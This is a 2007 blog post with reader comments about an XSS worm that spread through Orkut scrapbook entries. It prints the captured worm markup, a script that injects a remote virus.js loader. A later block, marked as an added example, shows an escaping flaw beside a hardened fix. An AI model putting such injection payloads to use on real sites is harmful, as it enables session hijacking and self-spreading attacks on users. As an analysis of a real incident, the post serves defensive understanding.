Tuesday, December 18, 2007

Orkut "virus"

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:
2008 vem ai... que ele comece mto bem para vc

I still don't know exactly what it means; I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!

I haven't done any kind of thorough analysis yet, but it looks like a JavaScript worm that kicks in via a Flash XSS? My HTML/JavaScript/Flash-fu is pretty darn weak. This is what it looked like:

<div id="flashDiv295378627">
  <embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style=""
         id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh"
         wmode="transparent" allownetworking="internal" allowscriptaccess="never"
         height="1" width="1"></embed>
</div>
<script type="text/javascript">
  var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627');
  flashWriter._addParam('wmode', 'transparent');
  script=document.createElement('script');
  script.src='http://files.myopera.com/virusdoorkut/files/virus.js';
  document.getElementsByTagName('head')[0].appendChild(script);
  escape('');
  flashWriter._addParam('allowNetworking', 'internal');
  flashWriter._addParam('allowScriptAccess', 'never');
  flashWriter._setAttribute('style', '');
  flashWriter._write('flashDiv295378627');
</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo Vírus do Orkut.

Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"
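The captured markup suggests, though this post does not confirm it, that a parameter value was copied unescaped into the generated script, letting it close the `_addParam` call and run its own statements. The following is an added example, not part of the original post and not Orkut's code, showing that pattern beside a hardened form; the function names, the `marker()` stand-in and the allowlist values are assumptions made for illustration.

```javascript
// Added example, not Orkut's code. Assumption: the page template copied a
// user-supplied embed parameter into a single-quoted JavaScript string.

// Vulnerable pattern: raw concatenation into a JS string literal.
function addParamNaive(name, value) {
  return "flashWriter._addParam('" + name + "', '" + value + "');";
}

// Hardened: JSON.stringify yields a valid JS string literal; the extra
// escapes keep "</script>" or a line separator from ending the block early.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/[<>&\u2028\u2029]/g,
      (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}
function addParamSafe(name, value) {
  return "flashWriter._addParam(" + jsLiteral(name) + ", " + jsLiteral(value) + ");";
}

// Stricter still: accept only known values (hypothetical allowlist).
const WMODE_VALUES = new Set(["window", "opaque", "transparent"]);
function isValidWmode(value) {
  return WMODE_VALUES.has(value);
}

// Run generated code against a stub flashWriter. Reports the arguments the
// stub received and whether any statement executed outside the call.
function runGenerated(code) {
  const calls = [];
  let brokeOut = false;
  const flashWriter = { _addParam: (n, v) => calls.push([n, v]) };
  const marker = () => { brokeOut = true; };
  new Function("flashWriter", "marker", code)(flashWriter, marker);
  return { calls, brokeOut };
}

// Constructed input shaped like the captured scrap: close the string and the
// call, run a statement, reopen a string. marker() is a harmless stand-in.
const CONSTRUCTED_VALUE = "transparent'); marker(); escape('";

const naive = runGenerated(addParamNaive("wmode", CONSTRUCTED_VALUE));
const safe = runGenerated(addParamSafe("wmode", CONSTRUCTED_VALUE));
console.log("naive broke out:", naive.brokeOut);
console.log("safe broke out:", safe.brokeOut);
console.log("allowlist accepts it:", isValidWmode(CONSTRUCTED_VALUE));
```

In the naive output the stub receives only `transparent` and the trailing statement runs on its own, which matches the shape of the script block above; in the hardened output the whole value arrives as one inert string.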


Alfredo said...

2008 vem ai... que ele comece mto bem para vc

2008 is coming... that it starts very well for you

Ryan Russell said...

Excellent, thanks! Brazilian Portuguese, then?

Anything interesting on the Orkut group page for infected people?

Alfredo said...

Yes, it is Brazilian Portuguese. It is a conceptual virus. Also the idealizer clarifies its intentions in the page of the community.

Alfredo said...

Something interesting? You are making some joke? But the same idiotic things of always, but with a bigger intensity.

Ryan Russell said...

Interesting as in, I can't read Portuguese. ;) I was hoping you would continue the free translation service, and tell me the main points of what he had to say for himself.

For example, what's his excuse for infecting almost 400,000 users?

Alfredo said...

Only to show the fragilities of Orkut. Here, in Brazil, it's a very famous site. And the majority of the users is completely newbie/noob. My mother is included. Therefore a bug like this could affect people sufficiently.

More answers tomorrow. I need to sleep. It is 03:47 a.m. right now.

See you!